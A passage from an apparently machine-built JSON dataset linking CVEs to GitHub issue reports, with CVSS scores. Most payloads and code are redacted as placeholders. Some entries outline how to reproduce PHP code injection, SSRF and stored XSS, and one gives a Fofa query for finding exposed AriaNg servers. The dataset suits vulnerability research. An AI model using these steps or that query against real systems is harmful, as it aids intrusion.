    },
    {
        "CVE_ID": "CVE-2021-41128",
        "Issue_Url_old": "https://github.com/beatrichartz/csv/issues/103",
        "Issue_Url_new": "https://github.com/beatrichartz/csv/issues/103",
        "Repo_new": "beatrichartz/csv",
        "Issue_Created_At": "2021-10-06T08:33:36Z",
        "description": "Encode Formulas to prevent CSV injection. If this is a feature request, why do we need it? We are using this library to generate CSVs for user generated input and transmitting them to another party. APITAG sadly requires a CSV and not a sane format like a JSON) We did a pentest on the application The pentest uncovered a CSV Injection vulnerability URLTAG , if the user generated input includes formulas like APITAG To address this, I suggest to implement encoding of APITAG as APITAG If this is a bug, steps to reproduce it Generate a CSV with a cell value of APITAG Open with Excel See value APITAG Is your input CSV RFC NUMBERTAG URLTAG compliant? Yes Are you interested in helping with a PR? Yes",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41170",
        "Issue_Url_old": "https://github.com/sroehrl/neoan3-template/issues/8",
        "Issue_Url_new": "https://github.com/sroehrl/neoan3-template/issues/8",
        "Repo_new": "sroehrl/neoan3-template",
        "Issue_Created_At": "2021-10-21T23:24:03Z",
        "description": "Closure injection has a vulnerability. In the template evaluation, closures are evaluated based on whether a value is callable within the current scope. In theory, one could create a multi step attack by storing particular values into the database that are known to be eventually rendered by the template engine. would the value of such a key happen to be a callable, one could execute global or local functions & methods. While it is unclear how one could use this to exploit neoan3, this constitutes a security concern.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41189",
        "Issue_Url_old": "https://github.com/DSpace/DSpace/issues/7928",
        "Issue_Url_new": "https://github.com/dspace/dspace/issues/7928",
        "Repo_new": "dspace/dspace",
        "Issue_Created_At": "2021-09-02T14:01:40Z",
        "description": "REST service returns wrong object for the APITAG group. Describe the bug The APITAG group has the APITAG collection as linked object: URLTAG URLTAG This is not true, as it's not a APITAG group. FILETAG Related work URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-41195",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46888",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46888",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-02-03T16:47:27Z",
        "description": "PATHTAG crashes(aborts) when segment_ids is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior PATHTAG crashes(aborts) when APITAG is large Describe the expected behavior expect an exception message if the input is unexpected instead of crash Standalone code to reproduce the issue ~~~python APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41196",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/51936",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/51936",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-09-10T21:36:31Z",
        "description": "APITAG crashes. System information Have I written custom code (as opposed to using a stock example script provided in APITAG yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: n/a APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): n/a APITAG version (if compiling from source): n/a APITAG version: n/a GPU model and memory: n/a Describe the current behavior APITAG crashes when APITAG contains APITAG , and outputs a all inf tensor when APITAG contains negative values. Describe the expected behavior Expect a ERRORTAG to be thrown if the input APITAG contains zero or negative values. Standalone code to reproduce the issue If the APITAG has APITAG : ERRORTAG Outputs: ERRORTAG If the APITAG has negative values: ERRORTAG The output is a tensor with shape = APITAG and all inf values.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41197",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46890",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46890",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-02-03T17:44:30Z",
        "description": "PATHTAG crash(abort). System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior The following APIs crash(abortion) when the given size is large tf. APITAG APITAG tf. APITAG tf. APITAG Describe the expected behavior expect exception messages if the input is not expected instead of crash Standalone code to reproduce the issue APITAG ~~~python import tensorflow as tf import numpy as np APITAG size NUMBERTAG Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ APITAG ~~~python import tensorflow as tf import numpy as np APITAG target_height NUMBERTAG target_width NUMBERTAG Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ ERRORTAG ~~~python import tensorflow as tf import numpy as np APITAG target_height NUMBERTAG target_width NUMBERTAG offset_height NUMBERTAG offset_width NUMBERTAG Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ APITAG ~~~python import tensorflow as tf import numpy as np APITAG size NUMBERTAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG n NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41197",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/51908",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/51908",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-09-09T18:05:47Z",
        "description": "tf.pad crashes with large paddings. System information Have I written custom code (as opposed to using a stock example script provided in APITAG Yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG crashes when the argument \"paddings\" has large values. Describe the expected behavior Expect an exception to be thrown if the input paddings is unexpected. Standalone code to reproduce the issue ERRORTAG outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41198",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46911",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46911",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-02-04T04:10:44Z",
        "description": "tf. APITAG crash(aborts) when n is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash(aborts) when n is large Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG n NUMBERTAG Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41199",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46914",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46914",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-02-04T04:45:22Z",
        "description": "APITAG crashes(aborts) when size is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes(aborts) when size is large Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG data_format='channels_first', APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41200",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46909",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46909",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-02-04T03:59:44Z",
        "description": "tf. APITAG aborts . System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash (abort) Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG APITAG NUMBERTAG s. APITAG have a one element tensor Aborted (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41202",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46912",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46912",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-02-04T04:39:54Z",
        "description": "APITAG crashes(aborts) when num_rows contains large number. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes(aborts) when APITAG contains large number Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG APITAG ~~~ Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed: size NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41202",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46889",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46889",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-02-03T16:54:54Z",
        "description": "tf. APITAG crash (abort) when start is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash (abort) when start is large Describe the expected behavior expect no crash Standalone code to reproduce the issue ~~~python import tensorflow as tf APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Non OK status: APITAG status: Internal: Expected shape dimensions to be non negative, got NUMBERTAG Aborted (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41239",
        "Issue_Url_old": "https://github.com/nextcloud/server/issues/27122",
        "Issue_Url_new": "https://github.com/nextcloud/server/issues/27122",
        "Repo_new": "nextcloud/server",
        "Issue_Created_At": "2021-05-26T16:08:07Z",
        "description": "user_status \"last statuses\" widget leaks account names. There should be an option to globally disable the APITAG statuses\" widget. It leaks account names, which might be the desired behaviour, but might as well be not. On \"semi public\" Nextcloud instances you usually don't want to expose other users to each other, which is also why e.g. APITAG can be disabled. Currently it's only possible to disable user_status altogether. It would be nice if there was the option to keep user_status enabled but disable the APITAG statuses\" widget.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41329",
        "Issue_Url_old": "https://github.com/datalust/seq-tickets/issues/1322",
        "Issue_Url_new": "https://github.com/datalust/seq-tickets/issues/1322",
        "Repo_new": "datalust/seq-tickets",
        "Issue_Created_At": "2021-09-15T23:38:50Z",
        "description": "Query cache collisions when queries differ only by in clause contents. Seq uses time slice caching to speed up APITAG queries and a few others, in particular, those that drive Dashboards URLTAG . Behind the scenes, cache entries are keyed based on the clauses of the query, active signals, and so on. A bug in recent Seq versions up to NUMBERTAG causes the keys generated for in clauses to collide, when all elements of the detected set are constants. For example: APITAG and ERRORTAG will generate the same cache key, and thus produce incorrect results when two cacheable queries differ only in this respect. The bug is caused by inlining of arrays of constants: instead of APITAG generating an expression that constructs an array with a constant element, the array is precomputed and inlined as a constant itself. The code that subsequently generates query cache keys does not properly account for this case. Query cache entries will not collide if: The queries do not group by time and are not executed from a dashboard, The queries run over different signals, Any other aspect of the query, including the select , where , group by , having , and order by clauses, differ in any way.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-4133",
        "Issue_Url_old": "https://github.com/keycloak/keycloak/issues/9247",
        "Issue_Url_new": "https://github.com/keycloak/keycloak/issues/9247",
        "Repo_new": "keycloak/keycloak",
        "Issue_Created_At": "2021-12-20T12:37:38Z",
        "description": "Incorrect authorization allows unpriviledged users to create other users. Describe the bug A incorrect authorization flaw was found in Keycloak NUMBERTAG the flaw allows an attacker with any existing user account to create new default user accounts via the administrative REST API even where new user registration is disabled. URLTAG Version NUMBERTAG Expected behavior _No response_ Actual behavior _No response_ How to Reproduce? _No response_ Anything else? _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41402",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/59",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/59",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2021-09-13T09:36:05Z",
        "description": "Code execution vulnerabilities in the background. Describe the bug Code execution vulnerabilities in the background To Reproduce Steps to reproduce the behavior: APITAG in to the background NUMBERTAG Go to APITAG position APITAG info and enter the malicious php code in the Permalink parameter to jump out of the structure to execute the malicious code APITAG save PATHTAG and PATHTAG files will be inserted with malicious code APITAG the homepage and you will see that the malicious code we inserted was successfully executed and returned the result Screenshots FILETAG Click Save New Page PATHTAG and PATHTAG files will be inserted with malicious code FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: APITAG Browser All Version Last version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41403",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/60",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/60",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2021-09-14T02:58:17Z",
        "description": "Server side request forgery vulnerability (SSRF). Describe the bug Server side request forgery vulnerability (SSRF) To Reproduce Steps to reproduce the behavior NUMBERTAG go to APITAG NUMBERTAG Enter the intranet address in the box to request NUMBERTAG Can make a request to the intranet Screenshots FILETAG request packet FILETAG Locate the vulnerable code APITAG The start_index parameter calls the function fc_crawler FILETAG Tracing the fc_crawler function Locate the vulnerable code ERRORTAG FILETAG Continue to track the APITAG function FILETAG Led to the SSRF vulnerability Desktop (please complete the following information): OS: APITAG Browser all Version last version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41413",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/20",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/20",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-09-10T01:15:24Z",
        "description": "bugs found in APITAG and APITAG via honggfuzz. Test code : CODETAG Tools: honggfuzz NUMBERTAG Target version: master NUMBERTAG Result: CODETAG Here are the poc CVETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41415",
        "Issue_Url_old": "https://github.com/youranreus/Subscription-Manager/issues/2",
        "Issue_Url_new": "https://github.com/youranreus/subscription-manager/issues/2",
        "Repo_new": "youranreus/subscription-manager",
        "Issue_Created_At": "2021-09-14T03:11:22Z",
        "description": "Subscription Manager NUMBERTAG FILETAG hava a SQL Injection Vulnerability. Vulnerability file: APITAG ERRORTAG In the APITAG file, the APITAG parameter and the APITAG parameter under the APITAG method are controllable, and the APITAG parameter is not strictly filtered, causing XSS injection vulnerabilities! POC ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41418",
        "Issue_Url_old": "https://github.com/Amozing/Am0zang/issues/1",
        "Issue_Url_new": "https://github.com/amozing/am0zang/issues/1",
        "Repo_new": "amozing/am0zang",
        "Issue_Created_At": "2021-09-14T10:09:23Z",
        "description": "APITAG has an unauthorized access vulnerability. APITAG for assets using Fofa:\" ariang\" && country=\"CN\" (It's OK without \u201dCN\u201c ) FILETAG APITAG You can view the download history, view APITAG status, settings and settings of APITAG FILETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41432",
        "Issue_Url_old": "https://github.com/flatpressblog/flatpress/issues/88",
        "Issue_Url_new": "https://github.com/flatpressblog/flatpress/issues/88",
        "Repo_new": "flatpressblog/flatpress",
        "Issue_Created_At": "2021-09-15T18:15:56Z",
        "description": "Stored XSS in the Blog Content. APITAG NUMBERTAG Stored XSS in the Blog Content A stored Cross Site Scripting (XSS) vulnerability exists in version NUMBERTAG of the APITAG application that allows for arbitrary execution of APITAG commands. Steps to reproduce the vulnerability NUMBERTAG isit the APITAG Administration area NUMBERTAG Navigate to the Entries > Write Entry NUMBERTAG Enter any Subject NUMBERTAG In the content area put the following payload: APITAG FILETAG NUMBERTAG Click the APITAG button NUMBERTAG Stored XSS payload is triggered. FILETAG Also we can verify the stored XSS payload by navigating to the home page. FILETAG Discovered by Martin Kubecka, September NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-41456",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1911",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1911",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-09-07T16:21:54Z",
        "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_send_sample. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41457",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1909",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1909",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-09-07T15:26:17Z",
        "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_init_parsing. [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG gd NUMBERTAG acad8 master NUMBERTAG compile with enable sanitizer NUMBERTAG make NUMBERTAG dirs which every of them has a large name(length NUMBERTAG this makes the file's abs path lengh larger than NUMBERTAG we called it APITAG NUMBERTAG run APITAG add {path to APITAG new new.mp4 Env: Ubunut NUMBERTAG clang NUMBERTAG My cmd line an ASAN report APITAG add PATHTAG new new.mp4 ASAN report: ERRORTAG Maybe fix for issue NUMBERTAG dose not consider this situation that there is a stack buffer overflow in nhmldmx_init_parsing",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41458",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1910",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1910",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-09-07T16:19:06Z",
        "description": "SEGV on unknown address in APITAG at PATHTAG in gf_blob_get. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41459",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1912",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1912",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-09-07T16:28:12Z",
        "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_send_sample. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG gd NUMBERTAG acad8 master NUMBERTAG compile with enable sanitizer NUMBERTAG run APITAG add APITAG new new.mp4 Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Different from issue NUMBERTAG the overflow memory is related to APITAG parameter. The APITAG para has the same problem, please fix them together. Buggy code at APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-4146",
        "Issue_Url_old": "https://github.com/pimcore/pimcore/issues/11024",
        "Issue_Url_new": "https://github.com/pimcore/pimcore/issues/11024",
        "Repo_new": "pimcore/pimcore",
        "Issue_Created_At": "2021-12-15T10:48:42Z",
        "description": "APITAG Pricing Rules Do not allow negative discounts. Expected behavior Not possible to set negative discounts Actual behavior It is possible to set negative discounts for Cart & Product discount actions, then adds it to to total amount. Steps to reproduce NUMBERTAG Login to the application URLTAG NUMBERTAG Navigate to Online shop > Pricing Rules > Voucher Discount > Actions NUMBERTAG Enter Negative amount in Cart Discount and click on save.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41461",
        "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/2006",
        "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/2006",
        "Repo_new": "concretecms/concrete5-legacy",
        "Issue_Created_At": "2021-09-16T06:01:54Z",
        "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter rel , APITAG , and mode in PATHTAG rel in PATHTAG and cID in PATHTAG without sufficient sanitization: URLTAG URLTAG URLTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41467",
        "Issue_Url_old": "https://github.com/hjue/JustWriting/issues/106",
        "Issue_Url_new": "https://github.com/hjue/justwriting/issues/106",
        "Repo_new": "hjue/justwriting",
        "Issue_Created_At": "2021-09-17T06:50:17Z",
